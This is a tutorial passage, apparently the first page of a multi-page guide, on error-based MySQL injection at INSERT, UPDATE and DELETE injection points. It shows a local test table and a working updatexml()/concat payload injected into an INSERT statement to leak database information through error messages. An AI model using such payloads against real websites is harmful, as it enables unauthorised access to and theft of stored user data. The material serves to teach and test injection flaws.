Getting data through insert, update, and delete injection 0x00
SQL injection can be used to obtain database data, which can be roughly divided into joint query, error reporting, Boolean blind injection, and delayed injection, these methods are generally implemented based on the SQL injection points in the select query statement. When we find an injection point based on insert, update, and delete statements (for example, some websites record user browsing records, including referer, client_ip, and user-agent, is there a function similar to user registration, password modification, information deletion, and so on), can we use the above method to obtain the data we need? Here, we take the MYSQL explicit error as an example to see how to obtain the desired data in the insert, update, and delete injection points.
0x01 environment setup
To better demonstrate the injection effect, we first use the following statement to create the original data:
create database newdb;use newdb; create table users(id int(3) not null auto_increment,username varchar(20) not null,password varchar(20) not null, primary key (id)); insert into users values(1,'Jane','Eyre');
Take a look at the current data structure:
0x02 injection syntax
Because the explicit error mode is used here, the idea is to use the following statement in the insert, update, and delete statements to create a syntax error:
insert into users (id, username, password) values (2,''inject here'','Olivia'); insert into users (id, username, password) values (2,""inject here"",'Olivia');
Note: We can see that the username field is to be filled in. we have entered the 'inject here 'and "inject here" fields to achieve an error, one is single quotation marks and the other is double quotation marks. it must be flexibly constructed according to the actual injection points.
0x03 use updatexml () to obtain data
The updatexml () function is an XPATH function for MYSQL to query and modify XML document data.
Payload:
or updatexml(1,concat(0x7e,(version())),0) or
Insert:
INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(version())),0) or'', 'Nervo');
[1] [2] [3] [4] [5] [6] Next page